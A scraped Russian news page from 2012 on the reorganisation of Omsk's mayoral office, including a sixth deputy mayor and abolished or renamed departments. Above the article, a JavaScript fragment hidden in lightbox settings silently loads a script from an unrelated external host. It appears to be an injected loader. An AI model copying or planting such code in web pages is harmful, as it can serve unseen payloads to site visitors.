, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 19 августа, 2018 года
3 октября, 2012 Городские новости

Мэр Двораковский нанимает себе шестого заместителя

mer-dvorakovskij-nanimaet-sebe-shestogo-zamestitelyaГорадминистрация представила очередные изменения в своей оргструктуре. У мэра появится еще зам, а часть департаментов поменяет функционал.

На вчерашнем заседании комитета по вопросам местного самоуправления, законности и правопорядка Омского горсовета были представлены очередные изменения в организационной структуре мэрии.

Как пояснили РИА «Омск-Информ» в пресс-центре Горсовета, согласно предложенным поправкам, у мэра Вячеслава Двораковского появится еще один заместитель (уже 6-й по счету), будут ликвидированы административно-техническая инспекция и департамент социальной политики, а отдельные управления и департаменты изменят свое название и расширят функционал.

По словам вице-мэра Ирины Парыгиной, очередные изменения в мэрии вызваны «продолжающейся оптимизацией штатной численности администрации Омска и выполняемого структурными подразделениями функционала». В частности, это позволит высвободить 22 штатных сотрудника.

После некоторого перерыва статус заместителя мэра будет возвращен управляющему делами горадминистрации. К его компетенции дополнительно отнесено решение вопросов информационной безопасности и обеспечения деятельности объектов режимного характера, что автоматически повышает статус управделами до уровня зама.

Кроме того, будет ликвидирована административно-техническая инспекция. Ее функции, связанные с выдачей ордеров на проведение благоустроительных работ, передадут в департамент городского хозяйства и энергетики. А контроль за соблюдением Правил благоустройства, чистоты и порядка на улицах Омска перейдет в ведение окружных администраций.

Департамент социальной политики продолжит работу по социальной защите населения, а также получит новые функции – это будет департамент общественных отношений и социальной политики.

Управление информационной политики «подняли» до уровня департамента. Департамент строительства, дорожной деятельности и благоустройства стал снова департаментом строительства, а две последние функции передал в департамент городского хозяйства и энергетики.

Как отмечается в пояснительной записке к проекту постановления мэрии, все вышеперечисленные изменения «не повлекут за собой дополнительных расходов из бюджета города Омска». Изменения в структуре еще будут, обещают чиновники.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Городские новости